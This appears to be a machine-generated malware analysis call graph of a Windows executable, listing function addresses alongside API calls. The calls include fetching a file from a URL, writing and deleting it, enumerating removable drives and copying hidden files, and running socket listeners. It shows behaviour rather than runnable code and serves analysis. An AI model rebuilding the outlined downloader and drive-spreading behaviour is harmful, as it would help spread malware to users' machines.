7 API calls 4725->4726 4733 402a35 _invalid_parameter 4726->4733 4727 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4727->4733 4728 402bc1 _invalid_parameter 4729 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4728->4729 4730 402be7 _invalid_parameter 4728->4730 4729->4728 4731 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4730->4731 4732 402c0d 4730->4732 4731->4730 4732->4683 4733->4727 4733->4728 4735 401400 _invalid_parameter 7 API calls 4734->4735 4736 40295f _invalid_parameter 4735->4736 4737 402880 _invalid_parameter 9 API calls 4736->4737 4738 402998 _invalid_parameter 4737->4738 4739 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4738->4739 4740 4029c3 4738->4740 4739->4738 4740->4700 4742 4087e2 4741->4742 4745 408730 4742->4745 4746 408b20 __aligned_recalloc_base 7 API calls 4745->4746 4753 408740 4746->4753 4749 408c70 _invalid_parameter 3 API calls 4751 4065ff 4749->4751 4750 40877c 4750->4749 4751->4605 4753->4750 4753->4751 4754 407c70 4753->4754 4761 408250 4753->4761 4766 408620 4753->4766 4755 407c83 4754->4755 4760 407c79 4754->4760 4756 407cc6 memset 4755->4756 4755->4760 4757 407ce7 4756->4757 4756->4760 4758 407ced memcpy 4757->4758 4757->4760 4774 407a40 4758->4774 4760->4753 4762 408267 4761->4762 4765 40825d 4761->4765 4763 40835f memcpy 4762->4763 4762->4765 4779 407f90 4762->4779 4763->4762 4765->4753 4768 408636 4766->4768 4772 40862c 4766->4772 4767 407f90 57 API calls 4769 4086b7 4767->4769 4768->4767 4768->4772 4770 407a40 6 API calls 4769->4770 4769->4772 4771 4086d6 4770->4771 4771->4772 4773 4086eb memcpy 4771->4773 4772->4753 4773->4772 4775 407a8e 4774->4775 4776 407a4e 4774->4776 4775->4760 4776->4775 4778 407980 6 API calls 4776->4778 4778->4776 4780 407fab 4779->4780 4782 407fa1 4779->4782 4780->4782 4785 407dd0 4780->4785 4782->4762 4784 407f90 57 API calls 4784->4782 4786 407ddd 4785->4786 4787 407de7 4785->4787 4786->4782 4786->4784 4787->4786 4788 407e70 4787->4788 4789 407e75 4787->4789 4790 407e58 4787->4790 4796 407730 4788->4796 4793 407a40 6 API calls 4789->4793 4792 407a40 6 API calls 4790->4792 4792->4788 4793->4788 4795 407f1c memset 4795->4786 4797 407749 4796->4797 4802 40773f 4796->4802 4798 407610 6 API calls 4797->4798 4797->4802 4799 407842 4798->4799 4800 408b20 __aligned_recalloc_base 7 API calls 4799->4800 4801 407891 4800->4801 4801->4802 4803 407490 44 API calls 4801->4803 4802->4786 4802->4795 4804 4078be 4803->4804 4805 408c70 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4804->4805 4805->4802 4825 408850 GetCurrentProcessId 4806->4825 4808 408b6b 4809 4089c0 __aligned_recalloc_base 5 API calls 4808->4809 4814 408b77 __aligned_recalloc_base 4808->4814 4809->4814 4810 404507 4810->4592 4810->4595 4811 408c20 HeapAlloc 4811->4814 4812 408bea HeapReAlloc 4812->4814 4813 408870 _invalid_parameter HeapValidate 4813->4814 4814->4810 4814->4811 4814->4812 4814->4813 4815 408c70 _invalid_parameter 3 API calls 4814->4815 4815->4814 4819 40ab8b 4816->4819 4817 408b20 __aligned_recalloc_base 7 API calls 4817->4819 4818 404596 4818->4595 4820 405c90 4818->4820 4819->4817 4819->4818 4821 408b20 __aligned_recalloc_base 7 API calls 4820->4821 4822 405ca0 4821->4822 4823 405ce7 4822->4823 4824 405cac memcpy CreateThread CloseHandle 4822->4824 4823->4595 4824->4823 4826 405bf0 4824->4826 4825->4808 4827 405c57 4826->4827 4833 405c01 4826->4833 4828 405c55 4827->4828 4829 40d4f0 60 API calls 4827->4829 4830 408c70 _invalid_parameter 3 API calls 4828->4830 4829->4828 4832 405c82 4830->4832 4831 405c10 StrChrA 4831->4833 4833->4828 4833->4831 4836 40d4f0 GetTickCount srand ExpandEnvironmentStringsW 4833->4836 4837 40d53e 4836->4837 4837->4837 4838 40d55c mbstowcs rand rand wsprintfW InternetOpenW 4837->4838 4839 40d760 InternetCloseHandle Sleep 4838->4839 4840 40d5f5 InternetOpenUrlW 4838->4840 4843 40d787 6 API calls 4839->4843 4861 405c3f Sleep 4839->4861 4841 40d753 InternetCloseHandle 4840->4841 4842 40d624 CreateFileW 4840->4842 4841->4839 4844 40d653 InternetReadFile 4842->4844 4845 40d746 CloseHandle 4842->4845 4846 40d809 wsprintfW DeleteFileW Sleep 4843->4846 4843->4861 4847 40d6a6 CloseHandle wsprintfW DeleteFileW Sleep 4844->4847 4848 40d677 4844->4848 4845->4841 4849 40d1d0 20 API calls 4846->4849 4866 40d1d0 CreateFileW 4847->4866 4848->4847 4850 40d680 WriteFile 4848->4850 4852 40d849 4849->4852 4850->4844 4854 40d853 Sleep 4852->4854 4855 40d887 DeleteFileW 4852->4855 4858 40d390 5 API calls 4854->4858 4855->4861 4856 40d739 DeleteFileW 4856->4845 4857 40d6fd Sleep 4859 40d390 5 API calls 4857->4859 4860 40d86a 4858->4860 4863 40d714 4859->4863 4860->4861 4864 40d87d ExitProcess 4860->4864 4861->4833 4862 40d730 4862->4845 4863->4862 4865 40d728 ExitProcess 4863->4865 4867 40d323 4866->4867 4868 40d217 CreateFileMappingW 4866->4868 4871 40d329 CreateFileW 4867->4871 4880 40d37a 4867->4880 4869 40d238 MapViewOfFile 4868->4869 4870 40d319 CloseHandle 4868->4870 4872 40d257 GetFileSize 4869->4872 4873 40d30f CloseHandle 4869->4873 4870->4867 4874 40d371 4871->4874 4875 40d34b WriteFile CloseHandle 4871->4875 4876 40d273 4872->4876 4877 40d305 UnmapViewOfFile 4872->4877 4873->4870 4878 408c70 _invalid_parameter 3 API calls 4874->4878 4875->4874 4886 40b1e0 4876->4886 4877->4873 4878->4880 4880->4856 4880->4857 4882 40ab80 7 API calls 4883 40d2be 4882->4883 4883->4877 4884 408c70 _invalid_parameter 3 API calls 4883->4884 4885 40d2fb 4884->4885 4885->4877 4887 40ac70 10 API calls 4886->4887 4888 40b204 4887->4888 4888->4877 4888->4882 4890 40c5ad htons inet_addr setsockopt 4889->4890 4897 40c6de 4889->4897 4891 409540 8 API calls 4890->4891 4892 40c626 bind lstrlenA sendto ioctlsocket 4891->4892 4896 40c67b 4892->4896 4893 40c6a2 4946 409600 shutdown closesocket 4893->4946 4896->4893 4898 408b60 9 API calls 4896->4898 4937 40c490 4896->4937 4897->4395 4898->4896 4953 40c260 memset InternetCrackUrlA InternetOpenA 4899->4953 4902 40cd4e 4902->4395 4904 408c70 _invalid_parameter 3 API calls 4904->4902 4908 40cd1b 4908->4904 4911 40cd11 SysFreeString 4911->4908 5060 409500 inet_addr 4914->5060 4917 4095ed 4922 40cfa0 4917->4922 4918 40959c connect 4919 4095b0 getsockname 4918->4919 4920 4095e4 4918->4920 4919->4920 5063 409600 shutdown closesocket 4920->5063 5064 4094e0 inet_ntoa 4922->5064 4924 40cfb6 4925 40b3e0 11 API calls 4924->4925 4926 40cfd5 4925->4926 4927 40d018 4926->4927 5065 40cd60 memset InternetCrackUrlA InternetOpenA 4926->5065 4927->4402 4930 40d00c 4932 408c70 _invalid_parameter 3 API calls 4930->4932 4931 408c70 _invalid_parameter 3 API calls 4931->4930 4932->4927 4935 408d94 4933->4935 4934 408d9a 4934->4396 4935->4934 4936 408c70 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 4935->4936 4936->4935 4945 40c4ac 4937->4945 4938 40c574 4938->4896 4939 40c4c8 recvfrom 4940 40c4f6 StrCmpNIA 4939->4940 4941 40c4e9 Sleep 4939->4941 4942 40c515 StrStrIA 4940->4942 4940->4945 4941->4945 4943 40c536 StrChrA 4942->4943 4942->4945 4947 40b290 4943->4947 4945->4938 4945->4939 4946->4897 4949 40b29b 4947->4949 4948 40b2a1 lstrlenA 4948->4949 4950 40b2b4 4948->4950 4949->4948 4949->4950 4951 408b20 __aligned_recalloc_base 7 API calls 4949->4951 4952 40b2d0 memcpy 4949->4952 4950->4945 4951->4949 4952->4949 4952->4950 4954 40c301 InternetConnectA 4953->4954 4955 40c477 4953->4955 4956 40c46a InternetCloseHandle 4954->4956 4957 40c33a HttpOpenRequestA 4954->4957 4955->4902 4966 40c000 4955->4966 4956->4955 4958 40c370 HttpSendRequestA 4957->4958 4959 40c45d InternetCloseHandle 4957->4959 4960 40c450 InternetCloseHandle 4958->4960 4962 40c38d 4958->4962 4959->4956 4960->4959 4961 40c3ae InternetReadFile 4961->4962 4963 40c3db 4961->4963 4962->4961 4962->4963 4964 408b60 9 API calls 4962->4964 4963->4960 4965 40c3f6 memcpy 4964->4965 4965->4962 4995 403fb0 4966->4995 4969 40c100 4969->4908 4976 40cbe0 4969->4976 4970 40c02a SysAllocString 4971 40c041 CoCreateInstance 4970->4971 4972 40c0f7 4970->4972 4973 40c0ed SysFreeString 4971->4973 4975 40c066 4971->4975 4974 408c70 _invalid_parameter 3 API calls 4972->4974 4973->4972 4974->4969 4975->4973 5012 40c110 4976->5012 4979 40cac0 5017 40c8e0 4979->5017 4984 40ca40 6 API calls 4985 40cb17 4984->4985 4991 40cb69 4985->4991 5034 40c860 4985->5034 4988 40cb4f 4988->4991 5039 40c200 4988->5039 4989 40c860 6 API calls 4989->4988 4991->4911 4992 40b3e0 4991->4992 5055 40b350 4992->5055 4998 403fbd 4995->4998 4996 403fc3 lstrlenA 4996->4998 5001 403fd6 4996->5001 4998->4996 4999 408b20 __aligned_recalloc_base 7 API calls 4998->4999 4998->5001 5002 408c70 _invalid_parameter 3 API calls 4998->5002 5003 403e90 4998->5003 5007 403f60 4998->5007 4999->4998 5001->4969 5001->4970 5002->4998 5004 403ea7 MultiByteToWideChar 5003->5004 5005 403e9a lstrlenA 5003->5005 5006 403ecc 5004->5006 5005->5004 5006->4998 5008 403f6b 5007->5008 5009 403f71 lstrlenA 5008->5009 5010 403e90 2 API calls 5008->5010 5011 403fa7 5008->5011 5009->5008 5010->5008 5011->4998 5015 40c136 5012->5015 5013 40c1db 5013->4908 5013->4979 5014 40c1b3 lstrcmpiW 5014->5015 5016 40c1cb SysFreeString 5014->5016 5015->5013 5015->5014 5015->5016 5016->5015 5019 40c906 5017->5019 5018 40ca1d 5018->4991 5029 40ca40 5018->5029 5019->5018 5020 40c993 lstrcmpiW 5019->5020 5021 40ca13 SysFreeString 5020->5021 5022 40c9a6 5020->5022 5021->5018 5023 40c200 2 API calls 5022->5023 5024 40c9b4 5023->5024 5024->5021 5025 40ca05 5024->5025 5026 40c9e3 lstrcmpiW 5024->5026 5025->5021 5027 40c9f5 5026->5027 5028 40c9fb SysFreeString 5026->5028 5027->5028 5028->5025 5030 40c200 2 API calls 5029->5030 5032 40ca5b 5030->5032 5031 40ca97 5031->4984 5031->4991 5032->5031 5033 40c8e0 6 API calls 5032->5033 5033->5031 5035 40c200 2 API calls 5034->5035 5037 40c87b 5035->5037 5036 40c8b7 5036->4988 5036->4989 5037->5036 5043 40c700 5037->5043 5041 40c226 5039->5041 5040 40c23d 5040->4991 5041->5040 5042 40c110 2 API calls 5041->5042 5042->5040 5045 40c726 5043->5045 5044 40c83d 5044->5036 5045->5044 5046 40c7b3 lstrcmpiW 5045->5046 5047 40c833 SysFreeString 5046->5047 5048 40c7c6 5046->5048 5047->5044 5049 40c200 2 API calls 5048->5049 5051 40c7d4 5049->5051 5050 40c825 5050->5047 5051->5047 5051->5050 5052 40c803 lstrcmpiW 5051->5052 5053 40c815 5052->5053 5054 40c81b SysFreeString 5052->5054 5053->5054 5054->5050 5059 40b35d 5055->5059 5056 40b300 _vscprintf wvsprintfA 5056->5059 5057 40b378 SysFreeString 5057->4911 5058 408b60 9 API calls 5058->5059 5059->5056 5059->5057 5059->5058 5061 40952c socket 5060->5061 5062 409519 gethostbyname 5060->5062 5061->4917 5061->4918 5062->5061 5063->4917 5064->4924 5066 40cf91 5065->5066 5067 40ce04 InternetConnectA 5065->5067 5066->4930 5066->4931 5068 40cf84 InternetCloseHandle 5067->5068 5069 40ce3d HttpOpenRequestA 5067->5069 5068->5066 5070 40ce73 HttpAddRequestHeadersA HttpSendRequestA 5069->5070 5071 40cf77 InternetCloseHandle 5069->5071 5072 40cf6a InternetCloseHandle 5070->5072 5075 40cebd 5070->5075 5071->5068 5072->5071 5073 40ced4 InternetReadFile 5074 40cf01 5073->5074 5073->5075 5074->5072 5075->5073 5075->5074 5076 408b60 9 API calls 5075->5076 5077 40cf1c memcpy 5076->5077 5077->5075 5084 405947 5078->5084 5079 4058c0 CoCreateInstance 5079->5084 5080 405b1b 5082 405b24 SysFreeString 5080->5082 5083 405b2e SysFreeString 5080->5083 5081 408c70 _invalid_parameter 3 API calls 5081->5080 5082->5083 5083->4405 5084->5079 5085 405a96 SysAllocString 5084->5085 5086 405962 5084->5086 5085->5084 5085->5086 5086->5080 5086->5081 5088 40a8ba 5087->5088 5089 40a8be 5087->5089 5088->4411 5091 40a870 CryptAcquireContextW 5089->5091 5092 40a8ab 5091->5092 5093 40a88d CryptGenRandom CryptReleaseContext 5091->5093 5092->5088 5093->5092 5094->4435 5134 409770 gethostname 5095->5134 5098 409a49 5098->4435 5100 409a5c strstr 5101 409a6c 5100->5101 5102 409aad 5100->5102 5138 4094e0 inet_ntoa 5101->5138 5140 4094e0 inet_ntoa 5102->5140 5105 409a7a strstr 5105->5098 5107 409a8a 5105->5107 5106 409abb strstr 5108 409acb 5106->5108 5109 409b0c EnterCriticalSection 5106->5109 5139 4094e0 inet_ntoa 5107->5139 5141 4094e0 inet_ntoa 5108->5141 5111 409b24 5109->5111 5119 409b4f 5111->5119 5143 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 5111->5143 5113 409ad9 strstr 5113->5098 5115 409ae9 5113->5115 5114 409a98 strstr 5114->5098 5114->5102 5142 4094e0 inet_ntoa 5115->5142 5118 409c48 LeaveCriticalSection 5118->5098 5119->5118 5121 408b00 7 API calls 5119->5121 5120 409af7 strstr 5120->5098 5120->5109 5122 409b93 5121->5122 5122->5118 5144 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 5122->5144 5124 409bb1 5125 409bd3 Sleep 5124->5125 5126 409bdd 5124->5126 5128 409c03 5124->5128 5125->5124 5127 408c70 _invalid_parameter 3 API calls 5126->5127 5127->5128 5128->5118 5145 409660 5128->5145 5130->4439 5132 409660 14 API calls 5131->5132 5133 409763 LeaveCriticalSection 5132->5133 5133->4430 5135 409797 gethostbyname 5134->5135 5136 4097b3 5134->5136 5135->5136 5136->5098 5137 4094e0 inet_ntoa 5136->5137 5137->5100 5138->5105 5139->5114 5140->5106 5141->5113 5142->5120 5143->5119 5144->5124 5146 409674 5145->5146 5153 40966f 5145->5153 5147 408b20 __aligned_recalloc_base 7 API calls 5146->5147 5148 409688 5147->5148 5149 4096e4 CreateFileW 5148->5149 5148->5153 5150 409733 InterlockedExchange 5149->5150 5151 409707 WriteFile FlushFileBuffers CloseHandle 5149->5151 5152 408c70 _invalid_parameter 3 API calls 5150->5152 5151->5150 5152->5153 5153->5118 5155 40bb2d 5154->5155 5156 40bb91 5155->5156 5157 40bb51 WaitForSingleObject 5155->5157 5156->4446 5156->4447 5157->5155 5158 40bb6c CloseHandle 5157->5158 5158->5155 5160 4043f9 memset GetModuleHandleW 5159->5160 5161 404432 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5160->5161 5161->5161 5162 404470 CreateWindowExW 5161->5162 5163 40449b 5162->5163 5164 40449d GetMessageA 5162->5164 5165 4044cf ExitThread 5163->5165 5166 4044b1 TranslateMessage DispatchMessageA 5164->5166 5167 4044c7 5164->5167 5166->5164 5167->5160 5167->5165 5189 40d180 CreateFileW 5168->5189 5170 405628 ExitThread 5172 4054d0 5172->5170 5173 405618 Sleep 5172->5173 5174 405509 5172->5174 5192 404cb0 GetLogicalDrives 5172->5192 5173->5172 5198 404c50 5174->5198 5177 405540 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5178 4055b6 wsprintfW 5177->5178 5179 4055cb wsprintfW 5177->5179 5178->5179 5204 404fc0 _chkstk 5179->5204 5180 40553b 5183 405d4f Sleep 5182->5183 5184 405d66 5183->5184 5185 405de6 Sleep 5184->5185 5186 405d7e Sleep wsprintfA 5184->5186 5188 40d4f0 60 API calls 5184->5188 5185->5183 5257 40d440 InternetOpenA 5186->5257 5188->5184 5190 40d1c8 5189->5190 5191 40d1af GetFileSize CloseHandle 5189->5191 5190->5172 5191->5190 5195 404cdd 5192->5195 5193 404d56 5193->5172 5194 404cec RegOpenKeyExW 5194->5195 5196 404d0e RegQueryValueExW 5194->5196 5195->5193 5195->5194 5197 404d4a RegCloseKey 5195->5197 5196->5195 5196->5197 5197->5195 5199 404ca9 5198->5199 5200 404c6c 5198->5200 5199->5177 5199->5180 5239 404bd0 GetDriveTypeW 5200->5239 5203 404c9b lstrcpyW 5203->5199 5205 404fd7 5204->5205 5206 404fde 6 API calls 5204->5206 5205->5180 5207 405092 5206->5207 5208 4050d4 PathFileExistsW 5206->5208 5211 40d180 3 API calls 5207->5211 5209 405150 PathFileExistsW 5208->5209 5210 4050e5 PathFileExistsW 5208->5210 5214 405161 5209->5214 5215 4051a6 FindFirstFileW 5209->5215 5212 4050f6 CreateDirectoryW 5210->5212 5213 405118 PathFileExistsW 5210->5213 5216 40509e 5211->5216 5212->5213 5218 405109 SetFileAttributesW 5212->5218 5213->5209 5219 405129 CopyFileW 5213->5219 5220 405181 5214->5220 5221 405169 5214->5221 5215->5205 5237 4051cd 5215->5237 5216->5208 5217 4050b5 SetFileAttributesW DeleteFileW 5216->5217 5217->5208 5218->5213 5219->5209 5223 405141 SetFileAttributesW 5219->5223 5225 404d70 3 API calls 5220->5225 5244 404d70 CoInitialize CoCreateInstance 5221->5244 5222 40528f lstrcmpW 5226 4052a5 lstrcmpW 5222->5226 5222->5237 5223->5209 5227 40517c SetFileAttributesW 5225->5227 5226->5237 5227->5215 5229 405466 FindNextFileW 5229->5222 5230 405482 FindClose 5229->5230 5230->5205 5231 4052eb lstrcmpiW 5231->5237 5232 405352 PathMatchSpecW 5233 405373 wsprintfW SetFileAttributesW DeleteFileW 5232->5233 5232->5237 5233->5237 5234 4053d0 PathFileExistsW 5235 4053e6 wsprintfW wsprintfW 5234->5235 5234->5237 5236 405450 MoveFileExW 5235->5236 5235->5237 5236->5229 5237->5222 5237->5229 5237->5231 5237->5232 5237->5234 5248 404e80 CreateDirectoryW wsprintfW FindFirstFileW 5237->5248 5240 404c0a 5239->5240 5241 404bf8 5239->5241 5240->5199 5240->5203 5241->5240 5242 404c0c QueryDosDeviceW 5241->5242 5242->5240 5243 404c26 StrCmpNW 5242->5243 5243->5240 5245 404da6 5244->5245 5247 404de2 5244->5247 5246 404db0 wsprintfW 5245->5246 5245->5247 5246->5247 5247->5227 5249 404ed5 lstrcmpW 5248->5249 5250 404faf 5248->5250 5251 404eeb lstrcmpW 5249->5251 5256 404f01 5249->5256 5250->5237 5252 404f03 wsprintfW wsprintfW 5251->5252 5251->5256 5255 404f66 MoveFileExW 5252->5255 5252->5256 5253 404f7c FindNextFileW 5253->5249 5254 404f98 FindClose RemoveDirectoryW 5253->5254 5254->5250 5255->5253 5256->5253 5258 40d466 InternetOpenUrlA 5257->5258 5259 40d4d8 Sleep 5257->5259 5260 40d485 HttpQueryInfoA 5258->5260 5261 40d4ce InternetCloseHandle 5258->5261 5259->5184 5262 40d4c4 InternetCloseHandle 5260->5262 5263 40d4ae 5260->5263 5261->5259 5262->5261 5263->5262 5421 40b950 5422 40b9be 5421->5422 5423 40b967 5421->5423 5423->5422 5424 40b971 5423->5424 5425 40b9c3 5423->5425 5426 40ba0d 5423->5426 5427 408b00 7 API calls 5424->5427 5429 40b9e8 5425->5429 5430 40b9db InterlockedDecrement 5425->5430 5454 40a5b0 5426->5454 5431 40b97e 5427->5431 5432 408c70 _invalid_parameter 3 API calls 5429->5432 5430->5429 5443 40e0a0 5431->5443 5434 40b9f4 5432->5434 5436 408c70 _invalid_parameter 3 API calls 5434->5436 5436->5422 5439 40b9ab InterlockedIncrement 5439->5422 5440 40a210 170 API calls 5441 40ba33 5440->5441 5441->5422 5441->5440 5459 40a6b0 5441->5459 5444 40e0a4 5443->5444 5445 40b990 5443->5445 5444->5445 5446 40e0b5 InterlockedIncrement 5444->5446 5447 4098f0 5445->5447 5446->5445 5448 409770 2 API calls 5447->5448 5449 4098ff 5448->5449 5450 409909 5449->5450 5451 40990d EnterCriticalSection 5449->5451 5450->5422 5450->5439 5452 40992c LeaveCriticalSection 5451->5452 5452->5450 5455 40a5c3 5454->5455 5456 40a5ed memcpy 5454->5456 5457 408b60 9 API calls 5455->5457 5456->5441 5458 40a5e4 5457->5458 5458->5456 5460 40a6d9 5459->5460 5461 40a6ce 5459->5461 5460->5461 5462 40a6f1 memmove 5460->5462 5461->5441 5462->5461 5675 40be90 5678 40dbd0 5675->5678 5677 40beb1 5679 40dbef 5678->5679 5693 40dce3 5678->5693 5680 408b20 __aligned_recalloc_base 7 API calls 5679->5680 5679->5693 5681 40dc16 memcpy htons 5680->5681 5682 40dc66 sendto 5681->5682 5688 40dcbc 5681->5688 5683 40dc85 InterlockedExchangeAdd 5682->5683 5684 40dcb8 5682->5684 5683->5682 5686 40dc9b 5683->5686 5687 40dcd9 5684->5687 5684->5688 5685 408c70 _invalid_parameter 3 API calls 5689 40dccb 5685->5689 5690 408c70 _invalid_parameter 3 API calls 5686->5690 5691 408c70 _invalid_parameter 3 API calls 5687->5691 5688->5685 5689->5677 5692 40dcaa 5690->5692 5691->5693 5692->5677 5693->5677 5694 40bf10 5704 40dd70 5694->5704 5696 40bf9d 5698 40bf1e 5698->5696 5699 40bf38 InterlockedExchangeAdd 5698->5699 5700 40bf7c WaitForSingleObject 5698->5700 5703 40a0b0 13 API calls 5698->5703 5716 409c80 EnterCriticalSection 5698->5716 5699->5698 5699->5700 5700->5698 5701 40bf95 5700->5701 5721 40dd00 5701->5721 5703->5698 5705 408b00 7 API calls 5704->5705 5706 40dd7b CreateEventA socket 5705->5706 5707 40ddb2 5706->5707 5708 40ddb7 5706->5708 5709 40dd00 8 API calls 5707->5709 5710 40de1a 5708->5710 5711 40ddbd bind 5708->5711 5709->5708 5710->5698 5712 40ddf0 5711->5712 5713 40ddfc CreateThread 5711->5713 5714 40dd00 8 API calls 5712->5714 5713->5710 5731 40dad0 5713->5731 5715 40ddf5 5714->5715 5715->5698 5717 409cb7 LeaveCriticalSection 5716->5717 5718 409c9f 5716->5718 5717->5698 5719 40a8b0 3 API calls 5718->5719 5720 409caa 5719->5720 5720->5717 5722 40dd04 5721->5722 5728 40dd60 5721->5728 5723 40dd0c SetEvent WaitForSingleObject CloseHandle 5722->5723 5722->5728 5729 40dd34 5723->5729 5730 40dd50 5723->5730 5725 40dd5a 5726 408c70 _invalid_parameter 3 API calls 5725->5726 5726->5728 5727 408c70 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5727->5729 5728->5696 5729->5727 5729->5730 5759 409600 shutdown closesocket 5730->5759 5732 40dae5 ioctlsocket 5731->5732 5733 40dbb0 5732->5733 5741 40db0a 5732->5741 5734 408c70 _invalid_parameter 3 API calls 5733->5734 5736 40dbb6 5734->5736 5735 40db99 WaitForSingleObject 5735->5732 5735->5733 5737 40db34 recvfrom 5737->5735 5737->5741 5738 408b60 9 API calls 5738->5741 5739 40db79 InterlockedExchangeAdd 5742 40d9a0 5739->5742 5741->5735 5741->5737 5741->5738 5741->5739 5743 40d9d5 5742->5743 5744 40d9ff 5743->5744 5746 408b00 7 API calls 5743->5746 5752 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 5744->5752 5746->5744 5747 40da22 5753 40de30 5747->5753 5749 40dabe 5749->5741 5750 40da35 5750->5749 5751 40daab memmove 5750->5751 5751->5750 5752->5747 5754 40de42 5753->5754 5755 40de55 memcpy 5753->5755 5756 408b60 9 API calls 5754->5756 5758 40de71 5755->5758 5757 40de4f 5756->5757 5757->5755 5758->5750 5759->5725 5463 404955 5465 4048ce 5463->5465 5464 40495a LeaveCriticalSection 5465->5464 5466 408ce0 8 API calls 5465->5466 5467 40492c 5466->5467 5467->5464 5760 405315 5772 4052bb 5760->5772 5761 4052eb lstrcmpiW 5761->5772 5762 405466 FindNextFileW 5764 405482 FindClose 5762->5764 5765 40528f lstrcmpW 5762->5765 5763 405352 PathMatchSpecW 5766 405373 wsprintfW SetFileAttributesW DeleteFileW 5763->5766 5763->5772 5769 40548f 5764->5769 5768 4052a5 lstrcmpW 5765->5768 5765->5772 5766->5772 5767 4053d0 PathFileExistsW 5770 4053e6 wsprintfW wsprintfW 5767->5770 5767->5772 5768->5772 5771 405450 MoveFileExW 5770->5771 5770->5772 5771->5762 5772->5761 5772->5762 5772->5763 5772->5767 5773 404e80 11 API calls 5772->5773 5773->5772 5468 40b860 5469 4098f0 4 API calls 5468->5469 5470 40b873 5469->5470 5471 40b88a 5470->5471 5473 40b700 InterlockedExchangeAdd 5470->5473 5474 40b71d 5473->5474 5484 40b716 5473->5484 5490 40b610 5474->5490 5477 40b73d InterlockedIncrement 5487 40b747 5477->5487 5479 40b770 5500 4094e0 inet_ntoa 5479->5500 5481 40b77c 5482 40b840 InterlockedDecrement 5481->5482 5501 409600 shutdown closesocket 5482->5501 5484->5471 5485 408b20 __aligned_recalloc_base 7 API calls 5485->5487 5486 40b540 6 API calls 5486->5487 5487->5479 5487->5482 5487->5485 5487->5486 5488 40a210 170 API calls 5487->5488 5489 408c70 _invalid_parameter 3 API calls 5487->5489 5497 40a0b0 5487->5497 5488->5487 5489->5487 5491 40b61d socket 5490->5491 5492 40b632 htons connect 5491->5492 5493 40b68f 5491->5493 5492->5493 5494 40b67a 5492->5494 5493->5491 5496 40b683 5493->5496 5502 409600 shutdown closesocket 5494->5502 5496->5477 5496->5484 5498 409ec0 13 API calls 5497->5498 5499 40a0f1 5498->5499 5499->5487 5500->5481 5501->5484 5502->5496 5503 40b4e0 5508 40b480 5503->5508 5506 40b50e 5507 40b480 send 5507->5506 5509 40b491 send 5508->5509 5510 40b4c5 5509->5510 5511 40b4ae 5509->5511 5510->5506 5510->5507 5511->5509 5511->5510 5774 409620 5775 409623 WaitForSingleObject 5774->5775 5776 409651 5775->5776 5777 40963b InterlockedDecrement 5775->5777 5778 40964a 5777->5778 5778->5775 5779 409750 16 API calls 5778->5779 5779->5778 5780 40baa0 5786 40ec90 5780->5786 5783 40bae0 5784 40bac7 WaitForSingleObject 5790 40e0e0 5784->5790 5787 40bab6 5786->5787 5788 40ec97 5786->5788 5787->5783 5787->5784 5788->5787 5811 40eb00 5788->5811 5791 40e212 5790->5791 5792 40e0e8 5790->5792 5791->5783 5792->5791 5793 40e0f4 EnterCriticalSection 5792->5793 5794 40e190 LeaveCriticalSection SetEvent 5793->5794 5799 40e10b 5793->5799 5795 40e1c3 5794->5795 5796 40e1ab 5794->5796 5832 40bc90 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 5795->5832 5797 40e1b1 PostQueuedCompletionStatus 5796->5797 5797->5795 5797->5797 5799->5794 5800 40e11c InterlockedDecrement 5799->5800 5802 40e135 InterlockedExchangeAdd 5799->5802 5808 40e17b InterlockedDecrement 5799->5808 5800->5799 5801 40e1ce 5841 40bdd0 5801->5841 5802->5799 5804 40e148 InterlockedIncrement 5802->5804 5806 40e730 4 API calls 5804->5806 5806->5799 5808->5799 5809 40e1ff DeleteCriticalSection 5810 408c70 _invalid_parameter 3 API calls 5809->5810 5810->5791 5812 408b00 7 API calls 5811->5812 5813 40eb0b 5812->5813 5814 40eb18 GetSystemInfo InitializeCriticalSection CreateEventA 5813->5814 5820 40ec84 5813->5820 5815 40eb56 CreateIoCompletionPort 5814->5815 5816 40ec7f 5814->5816 5815->5816 5817 40eb6f 5815->5817 5818 40e0e0 36 API calls 5816->5818 5819 40baf0 8 API calls 5817->5819 5818->5820 5821 40eb74 5819->5821 5820->5787 5821->5816 5822 40eb7f WSASocketA 5821->5822 5822->5816 5823 40eb9d setsockopt htons bind 5822->5823 5823->5816 5824 40ec06 listen 5823->5824 5824->5816 5825 40ec1a WSACreateEvent 5824->5825 5825->5816 5826 40ec27 WSAEventSelect 5825->5826 5826->5816 5827 40ec39 5826->5827 5828 40ec5f 5827->5828 5829 40bba0 17 API calls 5827->5829 5830 40bba0 17 API calls 5828->5830 5829->5827 5831 40ec74 5830->5831 5831->5787 5833 40bcc6 InterlockedExchangeAdd 5832->5833 5834 40bda9 GetCurrentThread SetThreadPriority 5832->5834 5833->5834 5835 40bce0 5833->5835 5834->5801 5835->5834 5836 40bcf9 EnterCriticalSection 5835->5836 5837 40bd67 LeaveCriticalSection 5835->5837 5838 40bd43 WaitForSingleObject 5835->5838 5839 40bd7e 5835->5839 5840 40bd9c Sleep 5835->5840 5836->5835 5837->5835 5837->5839 5838->5835 5839->5834 5840->5835 5842 40bddc EnterCriticalSection 5841->5842 5849 40be52 CloseHandle CloseHandle WSACloseEvent 5841->5849 5845 40bdf8 5842->5845 5843 40be20 LeaveCriticalSection DeleteCriticalSection 5846 408c70 _invalid_parameter 3 API calls 5843->5846 5844 40be0b CloseHandle 5844->5845 5845->5843 5845->5844 5847 40be46 5846->5847 5848 408c70 _invalid_parameter 3 API calls 5847->5848 5848->5849 5850 409600 shutdown closesocket 5849->5850 5850->5809 5851 40b8a0 5854 40b8a4 5851->5854 5852 409c80 5 API calls 5852->5854 5853 40b8c0 WaitForSingleObject 5853->5854 5856 40b8e5 5853->5856 5854->5852 5854->5853 5855 40b700 184 API calls 5854->5855 5854->5856 5855->5854 5857 4041a0 GetWindowLongW 5858 4041c4 5857->5858 5859 4041e6 